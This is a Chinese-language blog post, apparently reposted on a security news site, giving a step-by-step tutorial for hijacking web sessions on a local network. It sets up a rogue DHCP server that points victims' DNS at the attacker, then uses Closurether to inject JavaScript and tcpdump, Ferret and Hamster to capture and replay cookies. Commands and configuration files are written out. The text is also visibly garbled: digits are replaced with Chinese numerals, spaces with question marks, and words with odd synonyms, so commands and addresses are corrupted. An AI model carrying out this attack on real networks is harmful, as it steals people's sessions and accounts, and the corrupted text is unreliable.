|
|
|
联系客服020-83701501

【投稿】中间人攻击之劫持会话

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
【投稿】中间人打击之挟制会话

前段年光redrain大神和1个学院派教授斗嘴最后连公民老公2一2;-王思聪都来观战啦!!?局域网再次进入了大众的视野~??局域网内无隐衷!?这两天没什么事务查了查中间人打击??了局创造网络上面的资料切实不是很完全??所以写了这篇文章给小黑们终止参考?自身程度无穷??大牛们不喜勿喷。。。

本次的中间人打击操作DHCP来挟制DNS?个人感到测试了几回后效果比arp坑骗要好很多

拓扑

路由器:一92.一68.一0一.202??netmask:255.255.255.0

本机地址:一92.一68.一0一.一08

必要的东西

Node.js

Closurether

tcpdump

Ferret

Hamster

Node的安放

Default
一23四56789 wget?http://nodejs.org/dist/v0.8.7/node-v0.8.7.tar.gz tar?zxvf?node-v0.8.7.tar.gz cd?node-v0.8.7 ./configure make?install

安放closurether

这个软件是做DNS的转发以担保DHCP的客户端的正常上彀

node安放实现后则能执行

Default
npm?install?-g?closurether

1般的会呈现差距错误

SSL?Error:?SELF_SIGNED_CERT_IN_CHAIN

1

方案行动:

Default
一23 root@kali:~/node-v0.8.7#?npm?install?npm?-g?--ca=null root@kali:~/node-v0.8.7#?npm?config?set?ca=""

2

再次执行

Default
npm?install?-g?closurether

若呈现

3

1直在等待,,果断关掉!!

从新执行

Default
root@kali:~/node-v0.8.7#make?install

执行closurether?呈现

4

阐明closurether?安放胜利

DHCP服务器的配置

Default
apt-get?install?dhcp3-server

把稳:咱们颠末路由器的DHCP给咱们分配ip地址?所以这块的interface不必配置成静态

Default
一23四5 cd?/etc/dhcp mv?dhcpd.conf?dhcpd.conf..stock nano?dhcpd.conf

配置如下:

Default
option?domain-name-servers?一92.一68.一0一.一08;

#DNS服务器?本机地址

Default
一23四56789 default-lease-time?6000; max-lease-time?800000; ddns-update-style?none; authoritative; log-facility?local7;

#subnet配置网络的基本静态

Default
一23 subnet?一92.一68.一0一.0?netmask?255.255.255.0{ range?一92.一68.一0一.一?一92.一68.一0一.25四;

#DHCP分配的地址池

Default
option?routers?一92.一68.一0一.202;

#路由地址

Default
option?broadcast-address?一92.一68.一0一.255;

#播送地址

Default
一23四5 default-lease-time?6000; max-lease-time?8000000; option?domain-name-servers?一92.一68.一0一.一08;

#DNS服务器??(本机)

}

操作

Default
/etc/init.d/isc-dhcp-server?start

启用DHCP服务??假如犯错则从/var/log/syslog?查看差距错误提示

Closurether终止DNS转发

Default
root@kali:~#?closurether

启动后则能看到挟制到的DHCP客户端的具体DNS记录

5

Js注入

找到extern这个文件

Default
一23 find?/?-name?extern.js nano?extern.js

参与注入模式

6

弹窗

7

挟制会话

用tcpdump窃听网络接口

8

Default
执行?tcpdump?-i?eth0?-w?/usr/share/hamster-sidejack/test.cap

这个过程或是相称的漫长。。。

还是会拼品德的。。。

不外躁急会有更多的播种哦!!

监听完毕后用ferret处理cap

这里我要吐槽1下?ferret这个东西太坑了??只在32位的kali上有??6四位是没有的

这里万万要把稳?不要看到ferret就去apt-get?install?ferret!!!!!

软件源中的ferret和咱们用的kali自带的ferret不是1个软件!!

1旦安放就笼盖掉了本来的软件??更坑的是网上找了很多多少帖子都没有这个小软件!

从/usr/bin中将ferret拷到/usr/share/hamster-sidejack

从/usr/share/hamster-sidejack中执行

Default
ferret –r /usr/share/hamster-sidejack/test.cap

查看hamster.txt?假若有模式是DNS的记录则阐明执行胜利

而后将hamster.txt改名为ferret.txt

启用hamster代理?查看挟制到的cookies

必要先清理本机cookies?以免冲突

Default
root@kali:~#cd?/usr/share/hamster-sidejack??//使hamster从/usr/share/hamster-sidejack查找ferret.txt

9

Default
root@kali:~#hamster

修改路由器的代理设置?会面http://hamster/

提交adapters(适配器)便可看到

10

关于这种打击并无什么好的行动方案

只需操作静态的ip地址分配

可是平凡的家庭网络有几个人不操作DHCP而静态配置网络呢

配置静态的DNS服务器可无效的警觉DNS挟制

参考资料:http://www.freebuf.com/articles/网站/四3一57.html

9一ri.org:原本关于内网坑骗的文章已经很多了,所以本文本来是不筹办发布的,但事后听说作者是个高中生,咱们惊异高中生在学业压力之余还能对技艺有所研究,同时关注业界静态,这让咱们追念起自己“不堪回忆”的高中期间。所以咱们还是发了这篇,也盼愿能鼓励下这位小友人继续快乐。本文所涉法度模范git上都有,请自行查找。

数安新闻+更多

证书相关+更多